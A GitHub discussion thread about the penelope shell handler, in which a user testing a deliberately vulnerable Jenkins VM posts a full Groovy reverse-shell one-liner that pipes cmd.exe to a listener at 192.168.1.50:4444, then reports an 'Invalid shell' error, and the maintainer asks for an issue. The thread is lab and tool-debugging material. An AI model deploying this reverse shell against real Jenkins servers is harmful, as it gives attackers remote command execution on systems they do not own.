### DISCUSSION TITLE
Invalid Shell ~ penelope

### DISCUSSION THREAD

**Discussion by TheAalCh3m1st** [brightio/penelope#33] [General]
I didn't want to clutter up "Issues" with any false positives, so I made a discussion here. I hope that it's okay.
--

I'm running a vulnerable vm hosting Jenkings, I have access to a CLI
and use this code to execute a reverse shell successfully with nc -lvnp 4444

```
String host="192.168.1.50";
int port=4444;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
```

When I execute this and expect to receive a reverse shell from penelope I get this error:

`[-] Invalid shell from Butler.hsd1.ma.comcast.net~192.168.1.50`

The box is Windows OS.

**Comment by brightio** [comment]
Hi @TheAalCh3m1st, this is a valid issue and thank you very much for reporting it! Could you please move it to issues so I look at it in the next days? Thanks!

**Reply by TheAalCh3m1st** [reply]
Will do
